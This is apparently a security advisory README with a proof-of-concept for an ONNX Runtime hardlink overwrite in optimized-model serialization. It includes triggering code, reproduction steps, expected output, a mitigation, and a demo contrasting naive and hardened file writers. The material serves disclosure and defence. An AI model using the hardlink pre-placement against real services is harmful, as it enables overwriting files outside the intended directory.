ONNX Runtime Optimized External Initializer Hardlink Overwrite PoC

Benign security proof-of-concept for a conditional ONNX Runtime optimized-model serialization hardlink overwrite.

Summary

ONNX Runtime 1.26.0 can overwrite a controlled file outside the optimized-model output directory when optimized external initializers are written to a filename that already exists as a hardlink.

The PoC creates:

  • outside_dir/outside_target.bin containing BEFORE_ORT_OPT_HARDLINK_WRITE
  • model_dir/optimized.data as a hardlink to that outside target
  • model_dir/source.onnx, a simple ONNX model with a float initializer

Then it runs ONNX Runtime with:

import onnxruntime as ort

so = ort.SessionOptions()
so.optimized_model_filepath = "model_dir/optimized.onnx"
so.add_session_config_entry(
    "session.optimized_model_external_initializers_file_name",
    "optimized.data",
)
so.add_session_config_entry(
    "session.optimized_model_external_initializers_min_size_in_bytes",
    "1",
)
# Creating the session triggers optimization and serialization of the
# optimized model; the relative initializer filename resolves next to optimized.onnx.
ort.InferenceSession("model_dir/source.onnx", so)

ORT opens model_dir/optimized.data with truncating write semantics and writes optimized external initializer bytes. Because that path is a hardlink, the outside target is overwritten too.

Severity

Medium, CVSS 5.3.

Rationale: controlled local file overwrite under hardlink constraints in an optimizer/converter path. This is weaker than a default loader issue because the application must save optimized external initializers to a predictable filename in an attacker-influenced directory.

Tested Versions

  • onnxruntime==1.26.0
  • onnx==1.21.0
  • Python 3.12.3
  • Linux filesystem with hardlink support

Files

  • verify_poc.py: Generates the model, creates the hardlink, runs ONNX Runtime optimized serialization, and verifies the overwrite.
  • results/runtime_output.txt: Captured local validation output.
  • requirements.txt: Tested dependency versions.

Reproduce

python -m venv .venv
. .venv/bin/activate
pip install -r requirements.txt

python verify_poc.py

Expected key output:

outside_before=BEFORE_ORT_OPT_HARDLINK_WRITE
hardlink_same_inode=True
hardlink_count=2
outside_after_size=64
outside_after_sha256=58dda328598e2f7fe472621bfc54935aaa354d1a6ebcaf9562cd743fd575eb19
impact=optimized_external_initializer_writer_overwrote_hardlink_target

Impact

If a service optimizes untrusted ONNX models in place or writes optimized external initializer data to a predictable filename inside an attacker-influenced model/output directory, an attacker can pre-place that filename as a hardlink and cause ONNX Runtime to truncate and overwrite the linked outside target.

The PoC is benign and overwrites only a controlled marker file created inside the PoC directory.

Limitations

  • Not remote code execution.
  • Not a default InferenceSession(model_path) loader issue.
  • Requires hardlink creation on the same filesystem.
  • Requires application-controlled optimized-model serialization settings and a predictable external initializer output filename.
  • The overwritten content is ONNX Runtime's optimized external initializer bytes, not arbitrary attacker-chosen bytes.

Artifact Hashes

1df4fa9449805b590e87ac03abbe6eb0076f2dca8d7908b28ecc072926a0d662  verify_poc.py

The generated runtime files are intentionally not committed because the verifier rebuilds them with local absolute paths.

Suggested Mitigation

When writing optimized external initializer files, open output files defensively and reject existing files with link count greater than one. Prefer exclusive create semantics or post-open inode/link-count validation before truncating external initializer outputs.
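The following added example is not part of this repository's verify_poc.py and does not use ONNX Runtime. It rebuilds the PoC's hardlink layout with plain file operations so the mechanism described in the Summary and the mitigation above can be seen side by side: naive_write models the truncating open that reaches the outside target through the link, and safe_write is a hypothetical hardened writer that creates exclusively and, when the output already exists, fstats the opened descriptor and refuses to truncate a file whose link count exceeds one. Function names, the temporary directory layout and the 64 zero bytes standing in for initializer data are all illustrative.

```python
import os
import stat
import tempfile

# Constructed marker, mirroring the PoC's marker text.
MARKER = b"BEFORE_ORT_OPT_HARDLINK_WRITE"


def naive_write(path: str, data: bytes) -> None:
    """Truncating write (O_WRONLY|O_CREAT|O_TRUNC): overwrites whatever inode
    `path` currently names, including a pre-placed hardlink's target."""
    with open(path, "wb") as f:
        f.write(data)


def safe_write(path: str, data: bytes) -> None:
    """Hypothetical hardened writer.

    1. Try an exclusive create; a pre-placed file of any kind fails here.
    2. If the path exists, open it WITHOUT O_TRUNC so nothing is destroyed yet,
       then fstat the descriptor (not the path) and refuse unless it is a
       regular file with exactly one link. Only then truncate and write.
    """
    nofollow = getattr(os, "O_NOFOLLOW", 0)  # also refuse symlinked outputs where supported
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | nofollow, 0o600)
    except FileExistsError:
        fd = os.open(path, os.O_WRONLY | nofollow)
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode) or st.st_nlink > 1:
            os.close(fd)
            raise PermissionError(
                f"refusing to overwrite {path}: nlink={st.st_nlink}, mode={oct(st.st_mode)}"
            )
        os.ftruncate(fd, 0)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def _read(path: str) -> bytes:
    with open(path, "rb") as f:
        return f.read()


def demo() -> dict:
    """Build the PoC layout in a temporary directory and exercise both writers."""
    with tempfile.TemporaryDirectory() as root:
        outside = os.path.join(root, "outside_dir", "outside_target.bin")
        inside = os.path.join(root, "model_dir", "optimized.data")
        os.makedirs(os.path.dirname(outside))
        os.makedirs(os.path.dirname(inside))
        with open(outside, "wb") as f:
            f.write(MARKER)
        # Attacker pre-places the predictable output filename as a hardlink.
        os.link(outside, inside)

        result = {
            "hardlink_same_inode": os.stat(outside).st_ino == os.stat(inside).st_ino,
            "hardlink_count": os.stat(inside).st_nlink,
        }

        # Hardened writer: must refuse and leave the outside target untouched.
        try:
            safe_write(inside, b"\x00" * 64)
            result["safe_refused"] = False
        except PermissionError:
            result["safe_refused"] = True
        result["outside_after_safe"] = _read(outside)

        # Truncating writer: the outside target is overwritten through the link.
        naive_write(inside, b"\x00" * 64)
        result["outside_after_naive"] = _read(outside)

        # Hardened writer on a fresh path: exclusive create succeeds normally.
        fresh = os.path.join(root, "model_dir", "fresh.data")
        safe_write(fresh, b"ok")
        result["fresh_written"] = _read(fresh)
        return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}={value!r}")
```

Checking st_nlink on the descriptor that will actually be written, rather than on the path beforehand, means a swap between the check and the open cannot slip a linked inode past the writer; a regular file with a single link cannot alias anything outside the output directory. The O_NOFOLLOW flag covers the symlink variant of the same pre-placement trick; it is not needed for the hardlink case this page describes.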
